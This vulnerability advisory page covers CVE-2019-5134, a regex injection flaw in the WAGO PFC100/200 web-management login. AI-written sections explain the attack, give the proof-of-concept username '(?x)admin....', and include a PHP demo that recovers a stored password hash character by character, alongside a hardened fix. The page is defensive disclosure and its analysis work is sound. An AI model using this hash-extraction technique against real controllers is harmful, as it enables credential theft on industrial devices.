VYPR
Unrated severity · NVD Advisory · Published Mar 10, 2020 · Updated Aug 4, 2024

CVE-2019-5134

Description

An exploitable regular expression without anchors vulnerability exists in the Web-Based Management (WBM) authentication functionality of WAGO PFC200 versions 03.00.39(12) and 03.01.07(13), and WAGO PFC100 version 03.00.39(12). A specially crafted authentication request can bypass regular expression filters, resulting in sensitive information disclosure.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A regex injection vulnerability in the WAGO PFC100/200 WBM authentication code lets an unauthenticated attacker control the pattern used to look up a user in the password file and, from the difference in behaviour between a matched and an unmatched line, disclose stored password hashes.

Vulnerability

The Web-Based Management (WBM) authentication functionality in WAGO PFC200 firmware versions 03.00.39(12) and 03.01.07(13), and WAGO PFC100 firmware version 03.00.39(12), contains a regular expression injection vulnerability in the PasswordCorrect() function of login.php. The function builds its pattern by concatenating the user-supplied $username directly into "/^" . $username . ":/" without escaping or validation. Any regex metacharacters in the username are therefore interpreted as pattern syntax, changing which password-file lines the pattern matches. The vulnerability is present in all firmware versions from at least version 10 and likely earlier [1].

Exploitation

An unauthenticated attacker sends a crafted HTTP request to the WBM login endpoint with a username containing regex metacharacters (for example .*, | or an inline option such as (?x)). PasswordCorrect() passes the unsanitized input to preg_match(), so the attacker decides which line of /etc/lighttpd/lighttpd-htpasswd.user (or /etc/shadow, if system authentication is configured) the pattern selects. The hashes are not returned in the response; instead, because the code behaves differently when a line matches (crypt() is evaluated) than when none does, the attacker can test candidate hash prefixes one character at a time and infer the stored hash of an arbitrary user [1].

Impact

Successful exploitation results in disclosure of password hashes for other users, leading to sensitive information disclosure. The attacker gains the ability to extract hashed credentials, which may be cracked offline to obtain plaintext passwords. The CVSSv3 score is 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N), indicating low confidentiality impact with no impact on integrity or availability [1].

Mitigation

As of the publication date (2020-03-10), no official patch has been released by WAGO. The vulnerability affects all firmware versions from at least version 10 and likely earlier. Users should monitor vendor advisories for updates. Until a fix is available, restrict network access to the WBM interface to trusted networks and consider using VPN or firewall rules to limit exposure [1].

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

  • Wago/PFC200 (llm-fuzzy)
    Range: = 03.00.39(12), 03.01.07(13)
  • Wago/PFC100 (llm-fuzzy)
    Range: = 03.00.39(12)
  • Wago/WAGO PFC100 Firmware (v5)
    Range: version 03.00.39(12)
  • Range: version 03.00.39(12)

Patches


No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input sanitization and regex anchoring in the username parameter allows regex metacharacter injection to bypass line-matching logic."

Attack vector

An unauthenticated attacker sends a specially crafted HTTP request to the Web-Based Management (WBM) login endpoint. The `$username` parameter is interpolated into a regex pattern (`preg_match("/^".$username.":/", $pwFileLine)`) without escaping; the only anchoring is the leading `^` and the trailing `:` the code appends, and both can be neutralised by pattern syntax in the username [CWE-777]. A username such as `(?x)admin....` shows the technique: in PCRE, `(?x)` switches on extended mode, in which whitespace is ignored and `#` starts a comment that runs to the end of the pattern, so the attacker can comment out the appended `:` and match the `admin` user's line in `/etc/lighttpd/lighttpd-htpasswd.user` (or `/etc/shadow`) with a pattern of their own choosing. Because `crypt()` is only evaluated when a line matched, the response time reveals whether the probe matched, and the attacker can brute-force the salt and hash character by character using that timing side channel [ref_id=1].

Affected code

The vulnerability resides in the `PasswordCorrect()` function in `login.php`. The function uses `preg_match("/^".$username.":/", $pwFileLine)` to match a username against lines in the password file. Because the `$username` variable is interpolated directly into the regex pattern without escaping or anchoring beyond the leading `^`, an attacker can supply a crafted username that matches unintended lines [ref_id=1].

What the fix does

The advisory does not include a patch diff, but the remediation follows from the root cause: the username must never reach the pattern as regex syntax. Either escape it with `preg_quote($username, '/')` before interpolation, or drop the regex entirely and split each password-file line on the first `:` and compare the username field with a strict string equality check. The `^` and `:` already in the pattern are not the problem, so tightening the anchors alone does not help. In addition, the code should do the same amount of work whether or not a username was found (for example, always evaluate `crypt()`, against a dummy hash if necessary) and compare hashes with a constant-time function such as `hash_equals()`, so that response time no longer reveals whether a line matched [ref_id=1]. No official patch is published in the provided bundle.

Preconditions

  • network: The WBM login endpoint must be network-accessible
  • auth: No authentication is required to reach the login page
  • input: The attacker must be able to send arbitrary HTTP POST/GET parameters to the login form

Reproduction

The advisory provides a proof-of-concept string: `(?x)admin....` supplied as the username matches the `admin` user's line in the password file. From there the attacker extends the pattern with the characters of the line recovered so far, appends one candidate character, and terminates the pattern with `#`, which in extended mode comments out the `:` the code adds. A probe whose prefix is correct matches the line and triggers `crypt()`; an incorrect one does not, and the resulting timing difference disclosing the full salt and password hash one character at a time [ref_id=1].
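The following PHP is an added example written for this page; it is not WAGO's firmware code and not part of the advisory. It reconstructs the shape of PasswordCorrect() described under "Affected code" and "Reproduction", puts the hardened version from "What the fix does" beside it, and runs the character-by-character recovery against a constructed two-account password file. Everything beyond the advisory's `"/^".$username.":/"` pattern is an assumption: the loop returning on the first matching line, the `user:hash` file layout, MD5-crypt hashes, the sample accounts, and the function names `passwordCorrectVulnerable`, `passwordCorrectHardened`, `lineSelected` and `recoverPasswordLine`. On the device the "did a line match" bit comes from response timing; here `lineSelected()` returns it directly so the demo is deterministic.

```php
<?php
// Added example, not WAGO's code: minimal reconstruction of the vulnerable
// PasswordCorrect() shape, a hardened version, and the hash recovery the
// regex injection enables. Loop structure, file layout and hashes are assumed.
declare(strict_types=1);

/** Constructed sample password file (not a real device file). */
function demoPasswordLines(): array
{
    return [
        'admin:' . crypt('wago-demo', '$1$Zz9ab3Kq$'),   // password: wago-demo
        'guest:' . crypt('guest', '$1$Qm4pX7Lr$'),       // password: guest
    ];
}

/**
 * Vulnerable shape: the username is interpolated into the pattern unescaped,
 * so regex syntax in it ("(?x)", "|", "#", ...) is honoured by preg_match().
 */
function passwordCorrectVulnerable(string $username, string $password, array $pwFileLines): bool
{
    foreach ($pwFileLines as $pwFileLine) {
        // An invalid pattern makes preg_match() return false (warning suppressed).
        if (@preg_match('/^' . $username . ':/', $pwFileLine) === 1) {
            [, $pwFileHash] = explode(':', trim($pwFileLine), 2);
            // crypt() runs only when a line matched: that difference is the
            // timing oracle an attacker measures on the real device.
            return crypt($password, $pwFileHash) === $pwFileHash;
        }
    }
    return false;
}

/**
 * Hardened: no regex at all. Split on the first ':' and compare the username
 * field exactly; evaluate crypt() on every path so a miss costs the same as a hit.
 */
function passwordCorrectHardened(string $username, string $password, array $pwFileLines): bool
{
    $storedHash = null;
    foreach ($pwFileLines as $pwFileLine) {
        $parts = explode(':', trim($pwFileLine), 2);
        if (count($parts) === 2 && $parts[0] === $username) {
            $storedHash = $parts[1];
        }
    }
    // Dummy hash keeps the amount of work constant when the user does not exist.
    $hash = $storedHash ?? crypt('dummy', '$1$dummysal$');
    $hashOk = hash_equals($hash, crypt($password, $hash));
    return $storedHash !== null && $hashOk;
}

/**
 * The one bit the attacker learns per request: did the injected pattern select
 * a line? On the device this is inferred from response time; returned directly here.
 */
function lineSelected(string $username, array $pwFileLines): bool
{
    foreach ($pwFileLines as $pwFileLine) {
        if (@preg_match('/^' . $username . ':/', $pwFileLine) === 1) {
            return true;
        }
    }
    return false;
}

/**
 * Recover "user:hash" one character at a time. Each probe is
 * "(?x)" + preg_quote(known prefix + candidate) + "#": extended mode turns "#"
 * into a comment, which swallows the ":" the vulnerable code appends.
 */
function recoverPasswordLine(string $targetUser, array $pwFileLines, int $maxLen = 80): string
{
    $alphabet = str_split('./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$');
    $known = $targetUser . ':';
    while (strlen($known) < $maxLen) {
        $next = null;
        foreach ($alphabet as $c) {
            $probe = '(?x)' . preg_quote($known . $c, '/') . '#';
            if (lineSelected($probe, $pwFileLines)) {
                $next = $c;
                break;
            }
        }
        if ($next === null) {
            break;                       // no candidate extends the line: end reached
        }
        $known .= $next;
    }
    return $known;
}

$lines = demoPasswordLines();
// "(?x)adm in#": whitespace ignored, trailing ":" commented out, admin line still selected.
var_dump(passwordCorrectVulnerable('(?x)adm in#', 'wago-demo', $lines));
var_dump(passwordCorrectHardened('(?x)adm in#', 'wago-demo', $lines));
var_dump(passwordCorrectHardened('admin', 'wago-demo', $lines));
var_dump(recoverPasswordLine('admin', $lines) === $lines[0]);
```

Run it with `php example.php` (PHP 7.3 or later, since `preg_quote()` only escapes `#` from 7.3). The recovery loop issues at most one probe per alphabet character per position, so a 40-character `admin:$1$...` line is recovered in a few thousand requests; on the device each probe is a login attempt whose timing has to be measured, which is why the fix both escapes the input and equalises the work done on the matched and unmatched paths.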

Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1

News mentions


No linked articles in our index yet.